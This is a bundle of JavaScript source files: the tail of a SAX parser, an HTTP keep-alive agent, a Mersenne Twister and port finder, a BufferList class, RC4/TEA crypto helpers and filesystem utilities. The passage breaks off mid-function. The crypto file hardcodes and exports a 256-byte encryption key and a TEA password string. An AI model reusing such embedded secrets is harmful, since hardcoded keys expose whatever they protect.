        else if (c === "?") parser.state = S.PROC_INST_ENDING
        else parser.procInstBody += c
      continue

      case S.PROC_INST_ENDING:
        if (c === ">") {
          emitNode(parser, "onprocessinginstruction", {
            name : parser.procInstName,
            body : parser.procInstBody
          })
          parser.procInstName = parser.procInstBody = ""
          parser.state = S.TEXT
        } else {
          parser.procInstBody += "?" + c
          parser.state = S.PROC_INST_BODY
        }
      continue

      case S.OPEN_TAG:
        if (is(nameBody, c)) parser.tagName += c
        else {
          newTag(parser)
          if (c === ">") openTag(parser)
          else if (c === "/") parser.state = S.OPEN_TAG_SLASH
          else {
            if (not(whitespace, c)) strictFail(
              parser, "Invalid character in tag name")
            parser.state = S.ATTRIB
          }
        }
      continue

      case S.OPEN_TAG_SLASH:
        if (c === ">") {
          openTag(parser, true)
          closeTag(parser)
        } else {
          strictFail(parser, "Forward-slash in opening tag not followed by >")
          parser.state = S.ATTRIB
        }
      continue

      case S.ATTRIB:
        
        if (is(whitespace, c)) continue
        else if (c === ">") openTag(parser)
        else if (c === "/") parser.state = S.OPEN_TAG_SLASH
        else if (is(nameStart, c)) {
          parser.attribName = c
          parser.attribValue = ""
          parser.state = S.ATTRIB_NAME
        } else strictFail(parser, "Invalid attribute name")
      continue

      case S.ATTRIB_NAME:
        if (c === "=") parser.state = S.ATTRIB_VALUE
        else if (c === ">") {
          strictFail(parser, "Attribute without value")
          parser.attribValue = parser.attribName
          attrib(parser)
          openTag(parser)
        }
        else if (is(whitespace, c)) parser.state = S.ATTRIB_NAME_SAW_WHITE
        else if (is(nameBody, c)) parser.attribName += c
        else strictFail(parser, "Invalid attribute name")
      continue

      case S.ATTRIB_NAME_SAW_WHITE:
        if (c === "=") parser.state = S.ATTRIB_VALUE
        else if (is(whitespace, c)) continue
        else {
          strictFail(parser, "Attribute without value")
          parser.tag.attributes[parser.attribName] = ""
          parser.attribValue = ""
          emitNode(parser, "onattribute",
                   { name : parser.attribName, value : "" })
          parser.attribName = ""
          if (c === ">") openTag(parser)
          else if (is(nameStart, c)) {
            parser.attribName = c
            parser.state = S.ATTRIB_NAME
          } else {
            strictFail(parser, "Invalid attribute name")
            parser.state = S.ATTRIB
          }
        }
      continue

      case S.ATTRIB_VALUE:
        if (is(whitespace, c)) continue
        else if (is(quote, c)) {
          parser.q = c
          parser.state = S.ATTRIB_VALUE_QUOTED
        } else {
          strictFail(parser, "Unquoted attribute value")
          parser.state = S.ATTRIB_VALUE_UNQUOTED
          parser.attribValue = c
        }
      continue

      case S.ATTRIB_VALUE_QUOTED:
        if (c !== parser.q) {
          if (c === "&") parser.state = S.ATTRIB_VALUE_ENTITY_Q
          else parser.attribValue += c
          continue
        }
        attrib(parser)
        parser.q = ""
        parser.state = S.ATTRIB
      continue

      case S.ATTRIB_VALUE_UNQUOTED:
        if (not(attribEnd,c)) {
          if (c === "&") parser.state = S.ATTRIB_VALUE_ENTITY_U
          else parser.attribValue += c
          continue
        }
        attrib(parser)
        if (c === ">") openTag(parser)
        else parser.state = S.ATTRIB
      continue

      case S.CLOSE_TAG:
        if (!parser.tagName) {
          if (is(whitespace, c)) continue
          else if (not(nameStart, c)) {
            if (parser.script) {
              parser.script += "</" + c
              parser.state = S.SCRIPT
            } else {
              strictFail(parser, "Invalid tagname in closing tag.")
            }
          } else parser.tagName = c
        }
        else if (c === ">") closeTag(parser)
        else if (is(nameBody, c)) parser.tagName += c
        else if (parser.script) {
          parser.script += "</" + parser.tagName
          parser.tagName = ""
          parser.state = S.SCRIPT
        } else {
          if (not(whitespace, c)) strictFail(parser,
            "Invalid tagname in closing tag")
          parser.state = S.CLOSE_TAG_SAW_WHITE
        }
      continue

      case S.CLOSE_TAG_SAW_WHITE:
        if (is(whitespace, c)) continue
        if (c === ">") closeTag(parser)
        else strictFail(parser, "Invalid characters in closing tag")
      continue

      case S.TEXT_ENTITY:
      case S.ATTRIB_VALUE_ENTITY_Q:
      case S.ATTRIB_VALUE_ENTITY_U:
        switch(parser.state) {
          case S.TEXT_ENTITY:
            var returnState = S.TEXT, buffer = "textNode"
          break

          case S.ATTRIB_VALUE_ENTITY_Q:
            var returnState = S.ATTRIB_VALUE_QUOTED, buffer = "attribValue"
          break

          case S.ATTRIB_VALUE_ENTITY_U:
            var returnState = S.ATTRIB_VALUE_UNQUOTED, buffer = "attribValue"
          break
        }
        if (c === ";") {
          parser[buffer] += parseEntity(parser)
          parser.entity = ""
          parser.state = returnState
        }
        else if (is(entity, c)) parser.entity += c
        else {
          strictFail(parser, "Invalid character entity")
          parser[buffer] += "&" + parser.entity + c
          parser.entity = ""
          parser.state = returnState
        }
      continue

      default:
        throw new Error(parser, "Unknown state: " + parser.state)
    }
  } 
  
  
  
  
  
  if (parser.position >= parser.bufferCheckPosition) checkBufferLength(parser)
  return parser
}

})(typeof exports === "undefined" ? sax = {} : exports)                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           

========



"use strict";




var
	http = require('http'),
	https = require('https'),
	util = require('util')
;



function KeepAliveAgent(options) {
    options = options || {};
    http.Agent.call(this, options);

    
    this.idleSockets = {};

    
    this.removeAllListeners('free');
    this.on('free', KeepAliveAgent.prototype.freeHandler.bind(this));

}
util.inherits(KeepAliveAgent, http.Agent);

function buildNameKey(host, port, localAddress) {
    var name = host + ':' + port;
    if (localAddress)
        name += ':' + localAddress;

    return name;
}

KeepAliveAgent.prototype.freeHandler = function (socket, host, port, localAddress) {
    var name = buildNameKey(host, port, localAddress);

    
    if (this.isSocketUsable(socket)) {
        socket._requestCount = socket._requestCount ? socket._requestCount + 1 : 1;

        if (!this.idleSockets[name])
            this.idleSockets[name] = [];

        this.idleSockets[name].push(socket);
    }

    
    if (this.requests[name] && this.requests[name].length) {
        var nextRequest = this.requests[name].shift();

        if (!this.requests[name].length)
            delete this.requests[name];

        this.addRequest(nextRequest, host, port, localAddress);
    }
};

KeepAliveAgent.prototype.addRequest = function (request, host, port, localAddress) {
    var name = buildNameKey(host, port, localAddress);

    var socket = this.nextIdleSocket(name);
    if (socket)
        request.onSocket(socket);
    else
        return http.Agent.prototype.addRequest.call(this, request, host, port, localAddress);
};

KeepAliveAgent.prototype.nextIdleSocket = function (name) {
    if (!this.idleSockets[name])
        return null;

    var socket;
    while (socket = this.idleSockets[name].shift()) {
        
        
        if (this.isSocketUsable(socket))
            return socket;
    }

    return null;
};

KeepAliveAgent.prototype.isSocketUsable = function (socket) {
    return !socket.destroyed;
};


KeepAliveAgent.prototype.removeSocket = function (socket, name, host, port, localAddress) {
    if (this.idleSockets[name]) {
        var idx = this.idleSockets[name].indexOf(socket);
        if (idx !== -1) {
            this.idleSockets[name].splice(idx, 1);
            if (!this.idleSockets[name].length)
                delete this.idleSockets[name];
        }
    }

    http.Agent.prototype.removeSocket.call(this, socket, name, host, port, localAddress);
};



function HTTPSKeepAliveAgent(options) {
    KeepAliveAgent.call(this, options);
    this.createConnection = https.globalAgent.createConnection;
}
util.inherits(HTTPSKeepAliveAgent, KeepAliveAgent);

HTTPSKeepAliveAgent.prototype.defaultPort = 443;

HTTPSKeepAliveAgent.prototype.isSocketUsable = function (socket) {
    
    
    return socket.pair && socket.pair.ssl;
};



module.exports = KeepAliveAgent;
KeepAliveAgent.Secure = HTTPSKeepAliveAgent;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               

========

var net = require('net');

var MersenneTwister = function (seed) {
    if (seed == undefined) {
        seed = new Date().getTime();
    }
    
    this.N = 624;
    this.M = 397;
    this.MATRIX_A = 0x9908b0df;   
    this.UPPER_MASK = 0x80000000; 
    this.LOWER_MASK = 0x7fffffff; 

    this.mt = new Array(this.N); 
    this.mti = this.N + 1; 

    this.init_genrand(seed);
}


MersenneTwister.prototype.init_genrand = function (s) {
    this.mt[0] = s >>> 0;
    for (this.mti = 1; this.mti < this.N; this.mti++) {
        var s = this.mt[this.mti - 1] ^ (this.mt[this.mti - 1] >>> 30);
        this.mt[this.mti] = (((((s & 0xffff0000) >>> 16) * 1812433253) << 16) + (s & 0x0000ffff) * 1812433253)
       + this.mti;
        this.mt[this.mti] >>>= 0;
    }
}

MersenneTwister.prototype.init_by_array = function (init_key, key_length) {
    var i, j, k;
    this.init_genrand(19650218);
    i = 1; j = 0;
    k = (this.N > key_length ? this.N : key_length);
    for (; k; k--) {
        var s = this.mt[i - 1] ^ (this.mt[i - 1] >>> 30)
        this.mt[i] = (this.mt[i] ^ (((((s & 0xffff0000) >>> 16) * 1664525) << 16) + ((s & 0x0000ffff) * 1664525)))
          + init_key[j] + j; 
        this.mt[i] >>>= 0; 
        i++; j++;
        if (i >= this.N) { this.mt[0] = this.mt[this.N - 1]; i = 1; }
        if (j >= key_length) j = 0;
    }
    for (k = this.N - 1; k; k--) {
        var s = this.mt[i - 1] ^ (this.mt[i - 1] >>> 30);
        this.mt[i] = (this.mt[i] ^ (((((s & 0xffff0000) >>> 16) * 1566083941) << 16) + (s & 0x0000ffff) * 1566083941))
          - i; 
        this.mt[i] >>>= 0; 
        i++;
        if (i >= this.N) { this.mt[0] = this.mt[this.N - 1]; i = 1; }
    }

    this.mt[0] = 0x80000000; 
}


MersenneTwister.prototype.genrand_int32 = function () {
    var y;
    var mag01 = new Array(0x0, this.MATRIX_A);
    

    if (this.mti >= this.N) { 
        var kk;

        if (this.mti == this.N + 1)   
            this.init_genrand(5489); 

        for (kk = 0; kk < this.N - this.M; kk++) {
            y = (this.mt[kk] & this.UPPER_MASK) | (this.mt[kk + 1] & this.LOWER_MASK);
            this.mt[kk] = this.mt[kk + this.M] ^ (y >>> 1) ^ mag01[y & 0x1];
        }
        for (; kk < this.N - 1; kk++) {
            y = (this.mt[kk] & this.UPPER_MASK) | (this.mt[kk + 1] & this.LOWER_MASK);
            this.mt[kk] = this.mt[kk + (this.M - this.N)] ^ (y >>> 1) ^ mag01[y & 0x1];
        }
        y = (this.mt[this.N - 1] & this.UPPER_MASK) | (this.mt[0] & this.LOWER_MASK);
        this.mt[this.N - 1] = this.mt[this.M - 1] ^ (y >>> 1) ^ mag01[y & 0x1];

        this.mti = 0;
    }

    y = this.mt[this.mti++];

    
    y ^= (y >>> 11);
    y ^= (y << 7) & 0x9d2c5680;
    y ^= (y << 15) & 0xefc60000;
    y ^= (y >>> 18);

    return y >>> 0;
}


MersenneTwister.prototype.genrand_int31 = function () {
    return (this.genrand_int32() >>> 1);
}


MersenneTwister.prototype.genrand_real1 = function () {
    return this.genrand_int32() * (1.0 / 4294967295.0);
    /* divided by 2^32-1 */
}

/* generates a random number on [0,1)-real-interval */
MersenneTwister.prototype.random = function () {
    return this.genrand_int32() * (1.0 / 4294967296.0);
    
}


MersenneTwister.prototype.genrand_real3 = function () {
    return (this.genrand_int32() + 0.5) * (1.0 / 4294967296.0);
    /* divided by 2^32 */
}

/* generates a random number on [0,1) with 53-bit resolution*/
MersenneTwister.prototype.genrand_res53 = function () {
    var a = this.genrand_int32() >>> 5, b = this.genrand_int32() >>> 6;
    return (a * 67108864.0 + b) * (1.0 / 9007199254740992.0);
}



function normalize(str) {
    str = str.toString();

    if (str.length == 1)
        return "0" + str;
    else
        return str;
}

function getDateString(date) {
    return normalize(date.getDate()) + "." +
            normalize(1 + parseInt(date.getMonth())) + "." +
                date.getFullYear();
}

function getTimeString(date) {
    return normalize(date.getHours()) + ":" +
            normalize(date.getMinutes()) + ":" +
                normalize(date.getSeconds());
}

function dateToHumanTime(td) {
    try {
        var td = new Date(td);
        return getDateString(td) + ' ' + getTimeString(td);
    } catch (e) {
        return 'Invalid Date';
    }
}

function getCurrentTimstamp() {
    return Math.round(+new Date() / 1000);
}

var exports = {
    getCurrentTimstamp: getCurrentTimstamp,
    getCurrentDateString : function(){
        return dateToHumanTime(new Date())
    },
    getCurrentDateFilenameString: function () {
        return dateToHumanTime(new Date()).replace(/\.|:|\s+/g, '_');
    },
    dateToHumanTime: dateToHumanTime,
    getTimeString: getTimeString,
    getDateString : getDateString,
    MersenneTwister: MersenneTwister,
    extend: function extend(dest, source) {
        for (var prop in source) {
            dest[prop] = source[prop];
        }
    }
};



exports.basePort = 10000;
exports.nextPort = function (port) {
    return port + 1;
};

exports.getPort = function (options, callback) {
    if (!callback) {
        callback = options;
        options = {};
    }

    options.port = options.port || exports.basePort;
    options.host = options.host || null;
    options.server = options.server || net.createServer(function () {
        //
        // Create an empty listener for the port testing server.
        //
    });

    function onListen() {
        exports.basePort = options.port + 1;
        options.server.removeListener('error', onError);
        options.server.close();
        callback(null, options.port)
    }

    function onError(err) {
        options.server.removeListener('listening', onListen);

        if (err.code !== 'EADDRINUSE' && err.code !== 'EACCES') {
            return callback(err);
        }

        exports.getPort({
            port: exports.nextPort(options.port),
            host: options.host,
            server: options.server
        }, callback);
    }

    options.server.once('error', onError);
    options.server.once('listening', onListen);
    options.server.listen(options.port, options.host);
};

module.exports = exports;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             

========







var Buffer = require('buffer').Buffer;
var EventEmitter = require('events').EventEmitter;

module.exports = BufferList;
module.exports.BufferList = BufferList; 

function BufferList(opts) {
    if (!(this instanceof BufferList)) return new BufferList(opts);
    EventEmitter.call(this);
    var self = this;
    
    if (typeof(opts) == 'undefined') opts = {};
    
    
    
    self.encoding = opts.encoding;
    
    
    self.construct = opts.construct || Buffer;
    
    var head = { next : null, buffer : null };
    var last = { next : null, buffer : null };
    
    
    
    var length = 0;
    self.__defineGetter__('length', function () {
        return length;
    });
    
    
    var offset = 0;
    
    
    self.write = function (buf) {
        if (!head.buffer) {
            head.buffer = buf;
            last = head;
        }
        else {
            last.next = { next : null, buffer : buf };
            last = last.next;
        }
        length += buf.length;
        self.emit('write', buf);
        return true;
    };
    
    self.end = function (buf) {
        if (buf instanceof Buffer) self.write(buf);
    };
    
    
    
    self.push = function () {
        var args = [].concat.apply([], arguments);
        args.forEach(self.write);
        return self;
    };
    
    
    
    
    self.forEach = function (fn) {
        if (!head.buffer) return new self.construct(0);
        
        if (head.buffer.length - offset <= 0) return self;
        var firstBuf = new self.construct(head.buffer.length - offset);
        head.buffer.copy(firstBuf, 0, offset, head.buffer.length);
        
        var b = { buffer : firstBuf, next : head.next };
        
        while (b && b.buffer) {
            var r = fn(b.buffer);
            if (r) break;
            b = b.next;
        }
        
        return self;
    };
    
    
    
    self.join = function (start, end) {
        if (!head.buffer) return new self.construct(0);
        if (start == undefined) start = 0;
        if (end == undefined) end = self.length;
        
        var big = new self.construct(end - start);
        var ix = 0;
        self.forEach(function (buffer) {
            if (start < (ix + buffer.length) && ix < end) {
                
                buffer.copy(
                    big,
                    Math.max(0, ix - start),
                    Math.max(0, start - ix),
                    Math.min(buffer.length, end - ix)
                );
            }
            ix += buffer.length;
            if (ix > end) return true; 
        });
        
        return big;
    };
    
    self.joinInto = function (targetBuffer, targetStart, sourceStart, sourceEnd) {
        if (!head.buffer) return new self.construct(0);
        if (sourceStart == undefined) sourceStart = 0;
        if (sourceEnd == undefined) sourceEnd = self.length;
        
        var big = targetBuffer;
        if (big.length - targetStart < sourceEnd - sourceStart) {
            throw new Error("Insufficient space available in target Buffer.");
        }
        var ix = 0;
        self.forEach(function (buffer) {
            if (sourceStart < (ix + buffer.length) && ix < sourceEnd) {
                
                buffer.copy(
                    big,
                    Math.max(targetStart, targetStart + ix - sourceStart),
                    Math.max(0, sourceStart - ix),
                    Math.min(buffer.length, sourceEnd - ix)
                );
            }
            ix += buffer.length;
            if (ix > sourceEnd) return true; 
        });
        
        return big;
    };
    
    
    
    
    
    
    self.advance = function (n) {
        offset += n;
        length -= n;
        while (head.buffer && offset >= head.buffer.length) {
            offset -= head.buffer.length;
            head = head.next
                ? head.next
                : { buffer : null, next : null }
            ;
        }
        self.emit('advance', n);
        return self;
    };
    
    
    
    
    
    self.take = function (n, encoding) {
        if (n == undefined) n = self.length;
        else if (typeof n !== 'number') {
            encoding = n;
            n = self.length;
        }
        var b = head;
        if (!encoding) encoding = self.encoding;
        if (encoding) {
            var acc = '';
            self.forEach(function (buffer) {
                if (n <= 0) return true;
                acc += buffer.toString(
                    encoding, 0, Math.min(n,buffer.length)
                );
                n -= buffer.length;
            });
            return acc;
        } else {
            
            return self.join(0, n);
        }
    };
    
    
    self.toString = function () {
        return self.take('binary');
    };
}
require('util').inherits(BufferList, EventEmitter);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 

========


var ScriptsEncryptionKey = [
	0x6a, 0x7c, 0xc0, 0xea, 0x4c, 0xc9, 0xa3, 0x37, 0xa9, 0x78, 0x55, 0x37, 0x16, 0x57, 0xc1, 0x15,
	0xbf, 0x2a, 0x69, 0xe9, 0x8b, 0x5d, 0xe1, 0xcb, 0x42, 0xeb, 0xee, 0xa9, 0xb2, 0x33, 0x07, 0xa2,
	0xe7, 0x09, 0x3d, 0x78, 0x52, 0xd1, 0xa8, 0x3f, 0x42, 0x85, 0xed, 0x43, 0xaa, 0xbc, 0x56, 0x7b,
	0xb9, 0x79, 0x0f, 0xe8, 0x7e, 0x9c, 0x2a, 0x5b, 0x07, 0xea, 0xb3, 0xa8, 0x43, 0xb6, 0x9a, 0x24,
	0xd0, 0x5e, 0x26, 0xcd, 0xd7, 0xa7, 0x83, 0x66, 0x03, 0x06, 0xad, 0xc4, 0xd6, 0x2f, 0x81, 0xee,
	0x1e, 0x17, 0x73, 0x85, 0xe5, 0xfb, 0x90, 0xba, 0x71, 0x6f, 0xc7, 0xdd, 0x83, 0xd4, 0xd9, 0x42,
	0x22, 0x92, 0xce, 0x50, 0x6e, 0x24, 0xc4, 0x92, 0xb8, 0x2d, 0x62, 0xec, 0xa8, 0x47, 0xfd, 0xb5,
	0x7c, 0x8b, 0x27, 0x4a, 0x63, 0x12, 0xb9, 0x80, 0x00, 0xf8, 0xac, 0xb6, 0x61, 0xea, 0x0c, 0xa9,
	0x58, 0x53, 0x04, 0x12, 0x47, 0xe6, 0xf3, 0xa4, 0xf3, 0x34, 0x49, 0xa3, 0xe0, 0x9e, 0x36, 0x0d,
	0xc9, 0xa0, 0x1f, 0x0f, 0xfe, 0x0a, 0x54, 0x79, 0xf8, 0x29, 0xa3, 0xe8, 0x98, 0xbf, 0x43, 0x7e,
	0x80, 0x00, 0xd6, 0x6e, 0x81, 0xe0, 0x2d, 0x9f, 0x5b, 0x65, 0x07, 0x24, 0xe2, 0xcd, 0x8e, 0x8c,
	0xc5, 0xed, 0x71, 0xac, 0xbf, 0xd6, 0x6a, 0x95, 0x11, 0x06, 0x66, 0x74, 0x03, 0xc0, 0xaf, 0x7e,
	0x39, 0x4a, 0x8f, 0xb8, 0xdd, 0x0a, 0x88, 0xc9, 0x9a, 0xb2, 0x46, 0x71, 0xd1, 0xbf, 0x7d, 0x7e,
	0x38, 0xd6, 0xe3, 0x94, 0x84, 0xbd, 0x30, 0x7c, 0x37, 0x81, 0x8d, 0xef, 0xdf, 0x75, 0x35, 0xe4,
	0x56, 0x78, 0x02, 0x37, 0x9a, 0x25, 0x45, 0xe4, 0x7c, 0x8c, 0x28, 0x4b, 0x81, 0xc1, 0x2d, 0x80,
	0x26, 0xb2, 0xd2, 0x70, 0xb4, 0x25, 0x5e, 0xe4, 0xde, 0x93, 0x89, 0x52, 0xa1, 0x43, 0xf7, 0xb1
];



function CryptDecrypt(inp, inplen, key, keylen) {

    if (!key) key = ScriptsEncryptionKey;
    if (!keylen) keylen = ScriptsEncryptionKey.length;

    var Sbox = new Buffer(257);
    var Sbox2 = new Buffer(257);
    var temp = 0, k = 0;

    var i = 0, j = 0, t = 0, x = 0;

    for (var i = 0; i < 257; i++) {
        Sbox[i] = 0;
        Sbox2[i] = 0;
    }

    for (i = 0; i < 256; i++)
        Sbox[i] = i;

    if (keylen) {
        for (i = 0; i < 256 ; i++) {
            if (j == keylen)
                j = 0;
            Sbox2[i] = key[j++];
        }
    }

    j = 0;
    for (i = 0; i < 256; i++) {
        j = (j + Number(Sbox[i]) + Number(Sbox2[i])) % 256;
        temp = Sbox[i];
        Sbox[i] = Sbox[j];
        Sbox[j] = temp;
    }

    i = j = 0;
    for (x = 0; x < inplen; x++) {
        i = (i + 1) % 256;
        j = (j + Number(Sbox[i])) % 256;
        temp = Sbox[i];
        Sbox[i] = Sbox[j];
        Sbox[j] = temp;
        t = (Number(Sbox[i]) + Number(Sbox[j])) % 256;
        k = Sbox[t];
        inp[x] = (inp[x] ^ k);
    }

    return;
}

var Tea = new Function();
Tea.encrypt = function (plaintext, password) {
    if (plaintext.length == 0) return ('');  

    var v = Tea.strToLongs(Utf8.encode(plaintext));
    if (v.length <= 1) v[1] = 0;  
    var k = Tea.strToLongs(Utf8.encode(password).slice(0, 16));
    var n = v.length;
    var z = v[n - 1], y = v[0], delta = 0x9E3779B9;
    var mx, e, q = Math.floor(6 + 52 / n), sum = 0;

    while (q-- > 0) {  // 6 + 52/n operations gives between 6 & 32 mixes on each word
        sum += delta;
        e = sum >>> 2 & 3;
        for (var p = 0; p < n; p++) {
            y = v[(p + 1) % n];
            mx = (z >>> 5 ^ y << 2) + (y >>> 3 ^ z << 4) ^ (sum ^ y) + (k[p & 3 ^ e] ^ z);
            z = v[p] += mx;
        }
    }
    var ciphertext = Tea.longsToStr(v);
    return Base64.encode(ciphertext);
}
Tea.decrypt = function (ciphertext, password) {
    if (ciphertext.length == 0) return ('');
    var v = Tea.strToLongs(Base64.decode(ciphertext));
    var k = Tea.strToLongs(Utf8.encode(password).slice(0, 16));
    var n = v.length;

    

    var z = v[n - 1], y = v[0], delta = 0x9E3779B9;
    var mx, e, q = Math.floor(6 + 52 / n), sum = q * delta;

    while (sum != 0) {
        e = sum >>> 2 & 3;
        for (var p = n - 1; p >= 0; p--) {
            z = v[p > 0 ? p - 1 : n - 1];
            mx = (z >>> 5 ^ y << 2) + (y >>> 3 ^ z << 4) ^ (sum ^ y) + (k[p & 3 ^ e] ^ z);
            y = v[p] -= mx;
        }
        sum -= delta;
    }

    // ---- </TEA> ---- 

    var plaintext = Tea.longsToStr(v);

    
    plaintext = plaintext.replace(/\0+$/, '');

    return Utf8.decode(plaintext);
}
Tea.strToLongs = function (s) {
    var l = new Array(Math.ceil(s.length / 4));
    for (var i = 0; i < l.length; i++) {
        l[i] = s.charCodeAt(i * 4) + (s.charCodeAt(i * 4 + 1) << 8) +
			   (s.charCodeAt(i * 4 + 2) << 16) + (s.charCodeAt(i * 4 + 3) << 24);
    }
    return l;
}
Tea.longsToStr = function (l) {  // convert array of longs back to string
    var a = new Array(l.length);
    for (var i = 0; i < l.length; i++) {
        a[i] = String.fromCharCode(l[i] & 0xFF, l[i] >>> 8 & 0xFF,
								   l[i] >>> 16 & 0xFF, l[i] >>> 24 & 0xFF);
    }
    return a.join('');  // use Array.join() rather than repeated string appends for efficiency in IE
}
/**********************************************************************
*	prototypes B64
***********************************************************************/
var Base64 = new Function();
Base64.code = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
Base64.encode = function (str, utf8encode) {
    utf8encode = (typeof utf8encode == 'undefined') ? false : utf8encode;
    var o1, o2, o3, bits, h1, h2, h3, h4, e = [], pad = '', c, plain, coded;
    var b64 = Base64.code;

    plain = utf8encode ? Utf8.encode(str) : str;

    c = plain.length % 3;
    if (c > 0) { while (c++ < 3) { pad += '='; plain += '\0'; } }

    for (c = 0; c < plain.length; c += 3) {
        o1 = plain.charCodeAt(c);
        o2 = plain.charCodeAt(c + 1);
        o3 = plain.charCodeAt(c + 2);

        bits = o1 << 16 | o2 << 8 | o3;

        h1 = bits >> 18 & 0x3f;
        h2 = bits >> 12 & 0x3f;
        h3 = bits >> 6 & 0x3f;
        h4 = bits & 0x3f;

        e[c / 3] = b64.charAt(h1) + b64.charAt(h2) + b64.charAt(h3) + b64.charAt(h4);
    }
    coded = e.join('');
    coded = coded.slice(0, coded.length - pad.length) + pad;

    return coded;
}
Base64.decode = function (str, utf8decode) {
    utf8decode = (typeof utf8decode == 'undefined') ? false : utf8decode;
    var o1, o2, o3, h1, h2, h3, h4, bits, d = [], plain, coded;
    var b64 = Base64.code;

    coded = utf8decode ? Utf8.decode(str) : str;


    for (var c = 0; c < coded.length; c += 4) {
        h1 = b64.indexOf(coded.charAt(c));
        h2 = b64.indexOf(coded.charAt(c + 1));
        h3 = b64.indexOf(coded.charAt(c + 2));
        h4 = b64.indexOf(coded.charAt(c + 3));

        bits = h1 << 18 | h2 << 12 | h3 << 6 | h4;

        o1 = bits >>> 16 & 0xff;
        o2 = bits >>> 8 & 0xff;
        o3 = bits & 0xff;

        d[c / 4] = String.fromCharCode(o1, o2, o3);
        if (h4 == 0x40) d[c / 4] = String.fromCharCode(o1, o2);
        if (h3 == 0x40) d[c / 4] = String.fromCharCode(o1);
    }
    plain = d.join('');
    return utf8decode ? Utf8.decode(plain) : plain;
}
/**********************************************************************
*	prototypes UTF8
***********************************************************************/
var Utf8 = new Function();
Utf8.encode = function (strUni) {
    var strUtf = strUni.replace(
	  /[\u0080-\u07ff]/g,  // U+0080 - U+07FF => 2 bytes 110yyyyy, 10zzzzzz
	  function (c) {
	      var cc = c.charCodeAt(0);
	      return String.fromCharCode(0xc0 | cc >> 6, 0x80 | cc & 0x3f);
	  }
	);
    strUtf = strUtf.replace(
	  /[\u0800-\uffff]/g,  // U+0800 - U+FFFF => 3 bytes 1110xxxx, 10yyyyyy, 10zzzzzz
	  function (c) {
	      var cc = c.charCodeAt(0);
	      return String.fromCharCode(0xe0 | cc >> 12, 0x80 | cc >> 6 & 0x3F, 0x80 | cc & 0x3f);
	  }
	);
    return strUtf;
}
Utf8.decode = function (strUtf) {
    var strUni = strUtf.replace(
	  /[\u00c0-\u00df][\u0080-\u00bf]/g,                 // 2-byte chars
	  function (c) {  // (note parentheses for precence)
	      var cc = (c.charCodeAt(0) & 0x1f) << 6 | c.charCodeAt(1) & 0x3f;
	      return String.fromCharCode(cc);
	  }
	);
    strUni = strUni.replace(
	  /[\u00e0-\u00ef][\u0080-\u00bf][\u0080-\u00bf]/g,  // 3-byte chars
	  function (c) {  // (note parentheses for precence)
	      var cc = ((c.charCodeAt(0) & 0x0f) << 12) | ((c.charCodeAt(1) & 0x3f) << 6) | (c.charCodeAt(2) & 0x3f);
	      return String.fromCharCode(cc);
	  }
	);
    return strUni;
}

var TeaPassword = '6fm2MuSEij7HV2O5RX6IxDyBPGPccJu2';

exports.CryptDecrypt = CryptDecrypt;
exports.Tea = Tea;
exports.TeaPassword = TeaPassword;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                

========

var Fs = require('fs')
var Path = require('path')


function mkdir_p(path, perm, callback) {
  path = Path.resolve(process.cwd(), path)
  Fs.mkdir(path, perm, function(err) {
    if (!err) { callback() ; return }
    if (err.code === 'ENOENT') {
      mkdir_p(Path.dirname(path), perm, function(err) {
        if (err) {
          callback(err)
        } else {
          mkdir_p(path, perm, callback)
        }
      })
    } else if (err.code === 'EEXIST') {
      Fs.stat(path, function(sterr, stat) {
        if (sterr || !stat.isDirectory()) {
          callback(sterr)
        } else if (stat.mode != perm) {
          Fs.chmod(path, perm, callback)
        } else {
          callback()
        }
      })
    } else {
      callback(err)
    }
  })
}



function match_stub_fn(path, stat, depth, cb) { cb() }

function find(path, options, callback) {

  
  options = options || {}
  var match_fn = options.match_fn || match_stub_fn
  var dir_fn = options.dir_fn || match_stub_fn
  var serial = !!options.serial

  
  var normalize = Path.normalize
  var join = Path.join
  var stat = options.follow ? Fs.stat : Fs.lstat
  var readdir = Fs.readdir

  
  var base = Path.resolve(process.cwd(), path)

  
  var inos = {}

  
  function walk(path, depth, cb) {
    
    stat(path, function (err, st) {
      
      if (err) { cb(err) ; return }
      
      
      if (options.follow) {
        
        var inode = st.ino
        if (inos[inode]) { cb() ; return }
        
        inos[inode] = true
      }
      
      match_fn.call(options, path, st, depth, function (err) {
        
        if (err && err !== true) { cb(err) ; return }
        
        if (!st.isDirectory()) { cb() ; return }
        
        readdir(path, function (err, files) {
          if (err) { cb(err) ; return }
          
          
          var len = files.length
          
          
          
          
          var collected = serial ? 0 : 1
          function collect() {
            if (collected >= len) {
              
              dir_fn.call(options, path, st, depth, cb)
            
            } else if (serial) {
              walk(join(path, files[collected]), depth + 1, collect)
            }
            collected++
          }
          
          
          if (len === 0 || serial) {
            collect()
          
          } else {
            for (var i = 0; i < len; i++) {
